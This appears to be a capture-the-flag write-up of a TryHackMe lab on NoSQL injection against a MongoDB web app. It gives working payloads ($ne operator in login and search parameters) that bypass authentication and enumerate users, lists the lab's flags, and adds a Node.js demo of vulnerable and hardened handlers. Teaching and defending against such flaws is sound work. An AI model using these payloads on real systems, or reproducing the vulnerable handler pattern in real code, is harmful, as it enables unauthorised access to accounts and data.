[Day 7] Migration Without Security

{Web Exploitation = NoSQLi}


Last updated 3 years ago


Logging into the server with the given credentials, I was able to interact with the MongoDB server and retrieve the first flag.

Interact with the MongoDB server to find the flag. What is the flag?

  • THM{8814a5e6662a9763f7df23ee59d944f9}

The following page is served on port 80 (HTTP).

Useful MongoDB operators

$eq - matches records whose field equals a given value.

$ne - matches records whose field is not equal to a given value.

$gt - matches records whose field is greater than a given value.

$where - matches records that satisfy a JavaScript condition.

$exists - matches records that have (or lack) a given field.

$regex - matches records whose field satisfies a regular expression.

Bypassing the login page is as simple as using the $ne operator on the password field: sending the password parameter as password[$ne]=anything turns the check into "password is not equal to anything", which is true for the real password, so the query for the chosen username matches without knowing the password.

We're in.

THM{b6b304f5d5834a4d089b570840b467a8}

10.10.121.120/search?username[$ne]=admin&role=guest

Once you are logged in, use the gift search page to list all usernames that have guest roles. What is the flag?

  • THM{2ec099f2d602cc4968c5267970be1326}

http://10.10.121.120/search?username=mcskidy&role[$ne]=guest

Use the gift search page to perform NoSQL injection and retrieve the mcskidy record. What is the details record?

  • ID:6184f516ef6da50433f100f4:mcskidy:admin
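As an added example (not code from the original writeup or from the TryHackMe box), the Node.js script below shows why both the login bypass and the two search requests above work. Express's extended query-string parser turns a parameter such as password[$ne]=x into the object { $ne: 'x' }, and a handler that copies request parameters straight into a find() filter lets the client choose the operator. The user records are constructed, the route handlers are hypothetical, and a small in-memory matcher stands in for MongoDB so the script runs offline.

```javascript
// Constructed sample collection (not the records on the THM box).
const users = [
  { _id: '1', username: 'admin',   password: 'supersecret', role: 'admin' },
  { _id: '2', username: 'mcskidy', password: 'hunter2',     role: 'admin' },
  { _id: '3', username: 'guest1',  password: 'guest',       role: 'guest' },
  { _id: '4', username: 'guest2',  password: 'guest',       role: 'guest' },
];

// Parse "a=1&b[$ne]=x" the way Express's extended (qs-style) parser does,
// one bracket level deep: "b[$ne]=x" becomes { b: { $ne: 'x' } }.
function parseQuery(qs) {
  const out = {};
  for (const part of qs.split('&')) {
    if (!part) continue;
    const [rawKey, rawVal = ''] = part.split('=');
    const key = decodeURIComponent(rawKey);
    const val = decodeURIComponent(rawVal.replace(/\+/g, ' '));
    const m = key.match(/^([^\[]+)\[([^\]]*)\]$/);
    if (m) {
      out[m[1]] = Object.assign(out[m[1]] || {}, { [m[2]]: val });
    } else {
      out[key] = val;
    }
  }
  return out;
}

// Minimal MongoDB-style matcher: a plain value means equality, an object
// carries one or more of the operators listed on this page.
function matchesField(actual, cond) {
  if (cond === null || typeof cond !== 'object') return actual === cond;
  return Object.entries(cond).every(([op, v]) => {
    switch (op) {
      case '$eq':     return actual === v;
      case '$ne':     return actual !== v;
      case '$gt':     return actual > v;
      case '$exists': return (actual !== undefined) === (v === 'true' || v === true);
      case '$regex':  return new RegExp(v).test(String(actual)); // attacker-controlled pattern
      default:        return false; // unknown operator: no match
    }
  });
}

function find(collection, filter) {
  return collection.filter(doc =>
    Object.entries(filter).every(([field, cond]) => matchesField(doc[field], cond)));
}

// Vulnerable login handler (hypothetical): parameters go straight into the filter,
// so password[$ne]=x matches any user whose password is not "x".
function vulnerableLogin(qs) {
  const q = parseQuery(qs);
  return find(users, { username: q.username, password: q.password });
}

// Hardened login handler: reject anything that is not a plain string, so an
// operator object can never reach the query. (Casting with String() also works.)
function hardenedLogin(qs) {
  const q = parseQuery(qs);
  if (typeof q.username !== 'string' || typeof q.password !== 'string') return [];
  return find(users, { username: q.username, password: q.password });
}

// Vulnerable search handler (hypothetical) behind the /search page above.
function vulnerableSearch(qs) {
  const q = parseQuery(qs);
  return find(users, { username: q.username, role: q.role }).map(u => u.username);
}

// Replay the three requests from the writeup against the in-memory data.
console.log(vulnerableLogin('username=admin&password[$ne]=x').map(u => u.username)); // [ 'admin' ]
console.log(hardenedLogin('username=admin&password[$ne]=x'));                          // []
console.log(vulnerableSearch('username[$ne]=admin&role=guest'));                       // [ 'guest1', 'guest2' ]
console.log(vulnerableSearch('username=mcskidy&role[$ne]=guest'));                     // [ 'mcskidy' ]
```

The hardened handler type-checks rather than blacklisting "$", because the operator object is only dangerous if it survives as an object; a string containing "$ne" is harmless as an equality value. The same check belongs on the search handler, which is left vulnerable here to reproduce the two enumeration requests.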

🎄